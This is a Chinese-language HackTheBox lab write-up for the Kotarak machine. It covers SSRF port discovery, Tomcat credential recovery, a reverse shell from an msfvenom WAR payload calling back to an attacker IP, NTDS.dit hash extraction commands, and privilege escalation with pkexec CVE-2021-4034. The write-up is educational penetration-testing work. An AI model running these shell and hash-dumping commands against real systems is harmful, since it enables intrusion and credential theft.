Kotarak - HackTheBox
Td

image

nmap扫描

image

image

访问8080

image

404,看看后台页面

image

猜不出密码

在看看60000

image

这里貌似有突破点了

image

他会以get请求去访问输入的地址

image

扫一下目录

image

image

一个phpinfo界面

在输入框中输入他127.0.0.1,让他请求本地

image

image

循环爆破一下后面的端口号

image

写得跟坨屎一样,但能用就行

image

image

888端口输出的比其他都多,看看

image

有个backup

image

用burp访问下

image

很明显,得到了tomcat的账号密码

image

接下来就简单了,上传个war包拿shell即可

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.12 LPORT=7777 -f war -o shell.war

image

提权

image

在家目录下发现一个dit文件

image

这玩意貌似存有密码,下载下来

https://github.com/libyal/libesedb/releases

apt-get install autoconf automake autopoint libtool pkg-config

./configure

make

make install

ldconfig

/usr/local/bin/esedbexport -m tables 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit

然后就会在当前目录下创建一个新目录,里面就是表

image

提取表内信息

git clone https://github.com/csababarta/ntdsxtract.git

python setup.py build && python setup.py install

dsusers.py ../datatable.3 ../link_table.5 hashdump --syshive /root/20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin --passwordhashes --lmoutfile lmout.txt --ntoutfile ntout.txt --pwdformat ophc

本来讲道理,这样就可以了,但我这里就是报错,死活报错

image

这貌似是少了个python库,但不知道咋安装

然后百度又搜到这个

https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

image

但这个要python3.9环境运行,python3.9安装方法

https://www.codenong.com/cs109775278/

image

太难了,放弃了,直接上别的了

pkexec

https://github.com/arthepsy/CVE-2021-4034

image

老天啊,早用早舒服啊

image

还不在这

find / -name root.txt

image

这貌似是在lxc的一个容器里面,相当于一个虚拟机了

image